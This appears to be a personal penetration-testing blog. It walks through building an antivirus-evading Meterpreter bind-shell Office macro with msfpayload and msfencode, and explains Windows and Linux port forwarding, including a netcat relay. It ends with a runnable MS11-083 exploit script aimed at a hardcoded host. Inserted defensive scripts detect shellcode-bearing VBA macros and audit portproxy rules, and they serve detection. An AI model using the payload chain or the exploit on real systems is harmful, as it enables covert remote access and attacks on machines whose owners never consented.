______ Y ______

My own personal time capsule.


Avoiding Anti-Virus with msfencode and Office

Quite simple actually, provided that we know how to use msfencode templates (the -x option) to work with the payload. This can be done in a few simple steps:

1) Generate the payload
2) Pipe it to msfencode with the -x option (using e.g. psexec.exe as the template)
3) Use shellcode2vbs.py to create a .vbs script containing a binary representation of the code
4) Paste the output into a macro in Word, Excel or any other application from the Office suite
5) Run the "ShellcodeExecute" macro from inside Office

So in command prompt it looks like:

./msfpayload windows/meterpreter/bind_tcp LPORT=4999 R | msfencode -e x86/shikata_ga_nai -c 8 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BIND_4999.R && python /pentest/tools/custom/shellcode2vbs.py BIND_4999.R BIND_4999.vbs 

And finally copy & paste the content of 'BIND_4999.vbs' into an MS Word document as a macro. Now upload it to create a listening shell on the system you got access to.
This can be nicely combined with port forwarding if access to the system is restricted by e.g. a firewall or it sits in a DMZ.
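From the defender's side, the artefact this technique leaves behind is a VBA module that carries an executable blob as a long run of byte literals, usually wired to an auto-executing entry point. The following scanner is an added example (not code from the original post or from the Metasploit project) that scores a macro's source text on exactly those two traits. The sample module text is constructed for the example: the macro name matches the post, the byte values are a repeating filler pattern rather than real shellcode, and the 64-literal threshold is an assumption a deployment would tune.

```python
import re

# Constructed sample VBA module, not from the original post: a macro named as in
# the post that stores its code as a long Array(...) of hex byte literals. The
# bytes are a repeating filler pattern (0x41..0x44), not actual shellcode.
_FILLER = ", ".join("&H%02X" % (0x41 + (i % 4)) for i in range(96))
SAMPLE_MACRO = """
Sub AutoOpen()
    ShellcodeExecute
End Sub

Sub ShellcodeExecute()
    Dim buf As Variant
    buf = Array(%s)
End Sub
""" % _FILLER

# Constructed benign module: colour constants are hex literals too, but they are
# 6 digits wide and there are only two of them.
BENIGN_MACRO = """
Sub FormatReport()
    Range("A1").Interior.Color = &HFF0000
    Range("A2").Interior.Color = &HC0C0C0
End Sub
"""

# Exactly two hex digits followed by a word boundary, so 6-digit colour
# constants like &HFF0000 are not counted as byte literals.
BYTE_LITERAL = re.compile(r"&H[0-9A-Fa-f]{2}\b")
SUB_DEF = re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+(\w+)",
                     re.IGNORECASE | re.MULTILINE)
# VBA procedure names that run without the user clicking anything.
AUTO_EXEC = {"autoopen", "auto_open", "autoexec", "document_open", "workbook_open"}


def count_byte_literals(src):
    """Number of two-digit &Hxx literals in the module source."""
    return len(BYTE_LITERAL.findall(src))


def sub_names(src):
    """All Sub procedure names defined in the module."""
    return SUB_DEF.findall(src)


def auto_exec_subs(src):
    """Subset of procedures that Office runs automatically on open."""
    return [n for n in sub_names(src) if n.lower() in AUTO_EXEC]


def scan_macro(src, min_bytes=64):
    """Flag a module that embeds a binary blob; report auto-exec hooks alongside."""
    literals = count_byte_literals(src)
    autos = auto_exec_subs(src)
    reasons = []
    if literals >= min_bytes:
        reasons.append("%d hex byte literals (embedded binary blob)" % literals)
    if autos:
        reasons.append("auto-executing entry point: " + ", ".join(autos))
    return {
        "byte_literals": literals,
        "auto_exec": autos,
        "suspicious": literals >= min_bytes,
        "reasons": reasons,
    }


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, scan_macro(src))
```

The module text would normally come from oletools' olevba or a similar VBA extractor; the scanner only needs the decoded source. Counting literals rather than matching a fixed byte sequence is deliberate: the encoder changes the bytes every run, but it cannot avoid storing a few hundred of them.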

Port forwarding on Windows

It can seem like a near-magical task, but it turns out ports can be forwarded on Windows quite easily by executing this command (typed at the netsh prompt):

> netsh 
> interface portproxy add v4tov4 listenport=445 listenaddress=192.168.0.1 connectport=445 connectaddress=192.168.0.2

This forwards TCP port 445 on 192.168.0.1 to port 445 on 192.168.0.2 on Windows (it needs an elevated prompt). The rule persists across reboots until it is deleted, so when auditing a host it is worth listing the current rules with "netsh interface portproxy show all".
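Because portproxy rules survive reboots and leave no process of their own, they are a common thing to audit on a Windows host. The following parser is an added example (not code from the original post or from Microsoft) that reads the text produced by "netsh interface portproxy show v4tov4" and flags rules that are not on an allow-list, listen on every interface, or relay an administrative port. The sample output is constructed to match that command's layout (the first row mirrors the post's example), and the allow-list and admin-port set are assumptions a deployment would adapt.

```python
import re

# Constructed sample in the layout of `netsh interface portproxy show v4tov4`
# output. The first row is the post's own rule; the second is an extra entry
# made up for the example.
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
192.168.0.1     445         192.168.0.2     445
0.0.0.0         3389        10.20.30.40     3389
"""

# One data row: listen address (IPv4 or *), listen port, connect host, connect port.
ROW = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3}|\*)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")

# Assumed set of ports whose relaying deserves a second look (SMB, RDP, WinRM).
ADMIN_PORTS = {445, 3389, 5985, 5986}


def parse_portproxy(text):
    """Return one dict per v4tov4 rule found in the netsh output."""
    rules = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            rules.append({
                "listen_addr": m.group(1),
                "listen_port": int(m.group(2)),
                "connect_addr": m.group(3),
                "connect_port": int(m.group(4)),
            })
    return rules


def audit_portproxy(text, allowed):
    """Flag rules not in `allowed` (a set of 4-tuples) and say why each is notable."""
    findings = []
    for rule in parse_portproxy(text):
        key = (rule["listen_addr"], rule["listen_port"],
               rule["connect_addr"], rule["connect_port"])
        if key in allowed:
            continue
        reasons = ["not in allow-list"]
        if rule["listen_addr"] in ("0.0.0.0", "*"):
            reasons.append("listens on all interfaces")
        if rule["listen_port"] in ADMIN_PORTS or rule["connect_port"] in ADMIN_PORTS:
            reasons.append("relays admin port %d" % rule["connect_port"])
        findings.append((rule, reasons))
    return findings


if __name__ == "__main__":
    known = {("192.168.0.1", 445, "192.168.0.2", 445)}
    for rule, reasons in audit_portproxy(SAMPLE_OUTPUT, known):
        print(rule, "->", "; ".join(reasons))
```

In practice the text comes from running the netsh command on the host; the same rules are also stored under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy, so a registry baseline catches them as well.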

On Linux (with net.ipv4.ip_forward enabled, since the DNAT target is another host):

> iptables -A PREROUTING -t nat -i eth1 -p tcp --source 192.168.0.5 --dport 8080 -j DNAT --to 192.168.0.2:8080

If neither is available, netcat can be used to relay the content of the stream to a specific port. Note that a plain pipe is one-directional: data arriving on port 6555 is forwarded, but replies from 192.168.0.2 are not sent back to the client. The -L flag is the Windows netcat's "listen harder" option; Linux builds use -l.

nc -L -p 6555 | nc 192.168.0.2 8080

MS11-083 killer

The following code attempts to exploit MS11-083 by flooding a closed UDP port with specially crafted packets (read more here).

import socket
import sys
import threading

try:
    from dpkt.ip import IP
    from dpkt.icmp import ICMP
except ImportError:
    print "install dpkt if you want this program to run!"
    sys.exit(1)


print "[+] MS11-083 killer by Y"
print "[+] contact : If you know me then give me a shout"

############ EDIT THIS #################
UDP_IP = "192.168.93.15"
UDP_PORT = 839
MESSAGE = "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x00\x00\x00\x00\x00\x00"
ThreadCount = 32
########################################

print " [+]UDP target IP:", UDP_IP
print " [+]UDP target port:", UDP_PORT
print " [+]UDP payload length:", len(MESSAGE)

def customPing(UDP_IP, repeat):
    # craft a custom ICMP echo request (the "debug trap" ping)
    dataCC = "\xCC\xCC\xCC\xCC\xCC\xCC"
    ip = IP(src='\x01\x02\x03\x04', dst=UDP_IP, p=1)
    icmp = ICMP(type=8, data=ICMP.Echo(id=123, seq=1, data=dataCC))
    ip.data = icmp
    ip.len += len(ip.data)
    print "[+] Building socket for final ping"
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW)
    s.connect((UDP_IP, 1))
    # send the packet `repeat` times
    print "[+] Sending final ping ( debug trap ) "
    for x in range(repeat):
        s.send(str(ip))

try:
    print "\t[+] Running UDP attack against -> ", UDP_IP, "on port ", UDP_PORT
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setblocking(0)  # set non-blocking mode

    class ThreadClass(threading.Thread):
        def run(self):
            c = 0
            # each thread sends its share of the 2^32 requests needed to overflow the counter
            while c < (4294967296 / ThreadCount):
                s.sendto(MESSAGE, (UDP_IP, UDP_PORT))
                c += 1
            # trigger the actual attack via ICMP messages ( the payload can probably trigger command execution !?)
            print "[+] Triggering actual attack "
            customPing(UDP_IP, 20)

    for i in range(ThreadCount):
        t = ThreadClass()
        t.start()
        print "[+] Thread ", i, " is starting and its name is : ", t.getName()

except Exception, e:
    print " [-] Exception occurred, reason : ", e

Note that this code is only for educational purposes and I do not take responsibility for any misuse.